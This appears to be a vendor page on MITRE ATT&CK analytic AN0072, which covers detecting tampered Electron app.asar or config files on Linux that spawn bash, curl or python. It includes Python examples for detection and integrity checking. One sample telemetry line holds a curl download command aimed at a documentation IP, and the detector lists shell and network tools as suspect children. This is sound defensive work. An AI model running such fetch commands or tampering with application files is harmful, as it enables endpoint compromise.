AN0072: Analytic 0072
Abuse of Linux Electron binaries by modifying app.asar or config JS files and spawning unexpected child processes (bash, curl, python).
Analyst context for executives and security teams
This analytic matters because Electron-based Linux applications are a place where tampering blends into normal user software: the application binary is trusted and routinely launched, and the JavaScript packed in app.asar (or loaded from configuration files) runs with the user's privileges every time the application starts. The supplied ATT&CK object focuses on modified app.asar or JavaScript configuration files that cause unexpected child processes such as bash, curl, or python to run. For security leaders, the decision is whether endpoint monitoring can distinguish legitimate Electron child-process behavior from suspicious script or network-capable child processes before the gap becomes an investigation blind spot.
Executive priority
Prioritize this as an endpoint visibility and software integrity question for Linux fleets that run Electron applications. Leaders should ask whether SOC teams can prove collection of Linux process lineage, file modification evidence for application resources, and alert triage procedures for unusual child processes from desktop applications. This supports incident readiness, audit evidence for monitoring coverage, and control prioritization around application integrity and least-privilege execution.
Technical view
For Linux systems, validate whether detections can correlate Electron application execution with modifications to app.asar or JavaScript configuration files and subsequent unexpected child processes, specifically bash, curl, or python as named in the ATT&CK description. Because the object provides no official detection logic and no tactic mapping, teams should treat AN0072 as a detection-validation prompt rather than a complete rule. SOC and IR teams should baseline normal Electron application child-process behavior, then investigate deviations with process lineage, file write history, user context, command-line arguments, and network activity where available.
Likely telemetry
- Linux process creation events with parent-child relationships
- Command-line arguments for spawned processes
- File modification events for Electron application resources such as app.asar and JavaScript configuration files
- Application execution context, including user account and executable path
- Network connection telemetry for child processes (curl, python, or shells), where it is collected
Detection direction
- Confirm that Linux endpoint telemetry preserves parent process, child process, command line, executable path, user, and timestamp fields.
- Baseline expected Electron application behavior before alerting solely on child processes, because some applications may legitimately launch helper processes.
- Prioritize review when Electron binaries spawn shells or scripting/network tools named in the object: bash, curl, or python.
- Correlate suspicious child process creation with recent modification of app.asar or JavaScript configuration files associated with the same application.
- Tune for local software inventory and approved Electron applications to reduce false positives.
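The correlation described in the technical view and in the detection direction above, as an added example in Python; it is not MITRE's or Glexia's code. The event schema and field names, the /opt/notes-app application and its expected helper list, the 24-hour lookback, and the sample events are all constructed assumptions: map the field names onto your EDR or auditd output and replace the inventory with your own.

```python
"""Correlate Electron child-process spawns with recent app.asar / config JS writes.

Added example, not MITRE or Glexia code. Event dicts, field names, paths, the
application inventory and the sample events below are constructed assumptions.
"""
import os
from datetime import datetime, timedelta

# Child images named in AN0072 (python3 added as an assumption: it is the usual
# interpreter binary name on current distributions).
SUSPECT_CHILDREN = {"bash", "curl", "python", "python3"}
# Application resources whose modification is the precursor.
RESOURCE_SUFFIXES = (".asar", ".js")
# A resource write this long before the spawn is treated as related (assumed tuning value).
WINDOW = timedelta(hours=24)
# Assumed local inventory: approved Electron binaries and the helper processes they
# are known to launch. Anything else they spawn is a deviation from baseline.
ELECTRON_INVENTORY = {
    "/opt/notes-app/notes-app": {"xdg-open", "notes-app"},
}


def ts(s):
    return datetime.fromisoformat(s)


# Constructed file-modification telemetry.
FILE_EVENTS = [
    {"time": ts("2026-03-01T09:12:00"), "path": "/opt/notes-app/resources/app.asar",
     "user": "alice", "writer": "/usr/bin/vim"},
    {"time": ts("2026-03-01T10:00:00"), "path": "/opt/notes-app/resources/icon.png",
     "user": "alice", "writer": "/usr/bin/cp"},
]
# Constructed process-creation telemetry (198.51.100.7 is a documentation address).
PROC_EVENTS = [
    {"time": ts("2026-03-01T09:30:00"), "parent_exe": "/opt/notes-app/notes-app",
     "child": "bash", "cmdline": "bash -c 'curl -s http://198.51.100.7/s -o /tmp/s'",
     "user": "alice"},
    {"time": ts("2026-03-01T09:31:00"), "parent_exe": "/opt/notes-app/notes-app",
     "child": "xdg-open", "cmdline": "xdg-open https://example.com", "user": "alice"},
    {"time": ts("2026-03-01T09:32:00"), "parent_exe": "/usr/bin/gnome-terminal",
     "child": "bash", "cmdline": "bash", "user": "alice"},
]


def app_dir(exe_path):
    """Packaged Electron apps ship as <dir>/<binary> with resources/app.asar beside the binary."""
    return os.path.dirname(exe_path) + "/"


def recent_resource_writes(proc, file_events):
    """Resource files under the parent's app directory written within WINDOW before the spawn."""
    prefix = app_dir(proc["parent_exe"])
    return sorted(
        f["path"] for f in file_events
        if f["path"].startswith(prefix)
        and f["path"].endswith(RESOURCE_SUFFIXES)
        and timedelta(0) <= proc["time"] - f["time"] <= WINDOW
    )


def correlate(proc_events, file_events, inventory=ELECTRON_INVENTORY):
    """Findings for inventoried Electron parents spawning unexpected suspect children.

    Severity is 'high' when a resource file of the same application was modified
    shortly before the spawn, 'medium' when only the child-process deviation is seen.
    """
    findings = []
    for p in proc_events:
        expected = inventory.get(p["parent_exe"])
        if expected is None:          # not an inventoried Electron binary: out of scope here
            continue
        if p["child"] in expected or p["child"] not in SUSPECT_CHILDREN:
            continue
        modified = recent_resource_writes(p, file_events)
        findings.append({
            "time": p["time"].isoformat(), "parent": p["parent_exe"], "child": p["child"],
            "cmdline": p["cmdline"], "user": p["user"], "modified": modified,
            "severity": "high" if modified else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in correlate(PROC_EVENTS, FILE_EVENTS):
        print(finding)
```

Only the bash spawn from the inventoried application is reported; the xdg-open helper is in the baseline and the bash launched from gnome-terminal has no Electron parent. Restricting parents to the inventory is the tuning step from the list above; at collection time an unlisted parent can also be recognised as Electron by a resources/app.asar beside its binary. Configuration JS that lives outside the application directory (for example under the user's config directory) needs a second path prefix in recent_resource_writes.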
Mitigation priorities
- Inventory Linux systems running Electron-based applications and identify where application files are user-writable or unmanaged.
- Restrict unnecessary write access to application directories and configuration locations where operationally feasible.
- Use software integrity monitoring or endpoint controls to detect unexpected changes to application resource files.
- Apply least-privilege principles so routine users and applications have only the permissions required.
- Ensure incident response playbooks include collection of modified application files, process lineage, and related network activity for suspected Electron application tampering.
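A minimal inventory, permission and integrity check for the first four mitigation points above, as an added Python example that is not part of this page or of any ATT&CK tooling. It builds a throwaway application tree with constructed file contents under a temporary directory; the notes-app name is an assumption, and the resources/ layout assumes the usual Electron packaging in which app.asar sits in a resources directory beside the binary (verify this against your own packages).

```python
"""Inventory Electron resource files, flag loose write permissions, and verify integrity.

Added example, not code from this page or from any ATT&CK tooling. The application
tree, file contents and the notes-app name are constructed under a temp directory.
"""
import hashlib
import os
import stat
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_resources(root):
    """app.asar plus .js files in an Electron resources/ directory under root.

    Assumption: packaged Electron apps keep app.asar (and any unpacked JS) in a
    'resources' directory beside the binary; adjust for other layouts.
    """
    hits = []
    for dirpath, _, files in os.walk(root):
        in_resources = os.path.basename(dirpath) == "resources"
        for name in files:
            if name == "app.asar" or (in_resources and name.endswith(".js")):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def writable_by_others(path):
    """Group- or world-writable: routine users could replace the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def baseline(root):
    """Map each resource file to its SHA-256; keep the result outside user-writable paths."""
    return {p: sha256_file(p) for p in find_resources(root)}


def verify(root, base):
    """Diff the current tree against a baseline and list loosely permissioned files."""
    current = baseline(root)
    return {
        "changed": sorted(p for p in current if p in base and current[p] != base[p]),
        "added": sorted(p for p in current if p not in base),
        "missing": sorted(p for p in base if p not in current),
        "writable": sorted(p for p in current if writable_by_others(p)),
    }


def demo():
    """Build a constructed app tree, baseline it, tamper with it, and return the report."""
    with tempfile.TemporaryDirectory() as root:
        res = os.path.join(root, "opt", "notes-app", "resources")
        os.makedirs(res)
        asar = os.path.join(res, "app.asar")
        cfg = os.path.join(res, "config.js")
        with open(asar, "wb") as fh:
            fh.write(b"constructed stand-in for a real asar archive")
        with open(cfg, "w") as fh:
            fh.write("module.exports = { telemetry: false };\n")
        for p in (asar, cfg):
            os.chmod(p, 0o644)
        base = baseline(root)

        # Simulated tampering: content appended to app.asar, its mode loosened,
        # and an extra script dropped into resources/.
        with open(asar, "ab") as fh:
            fh.write(b"\n// constructed appended bytes")
        os.chmod(asar, 0o666)
        extra = os.path.join(res, "preload.js")
        with open(extra, "w") as fh:
            fh.write("console.log('constructed extra script');\n")
        os.chmod(extra, 0o644)

        report = verify(root, base)
        return {k: [os.path.relpath(p, root) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print(demo())
```

Run this against the real installation roots (/opt, /usr/lib, /usr/share, and any per-user install directories) with the baseline written to a location the desktop user cannot modify; a "changed" or "added" entry for app.asar or a resources/*.js file, combined with a child-process finding for the same application, is the evidence the incident response playbook should collect.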
Analyst notes and limits
AN0072 is a detection analytic, not a technique description. The official description is narrow: Linux Electron binaries, modification of app.asar or config JavaScript files, and unexpected child processes including bash, curl, and python. No relationships, tactic mappings, aliases, or official detection content were supplied, so this assessment is framed around validation priorities rather than a specific detection rule.
This assessment is limited to the supplied ATT&CK fields and external reference. It does not establish prevalence, actor use, impact, exploitability, or guaranteed detection coverage. Local application inventory, Linux endpoint logging configuration, and a baseline of normal Electron application behavior are required to determine material risk and tuning requirements.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | d2bdf31c2c82… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN0072 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.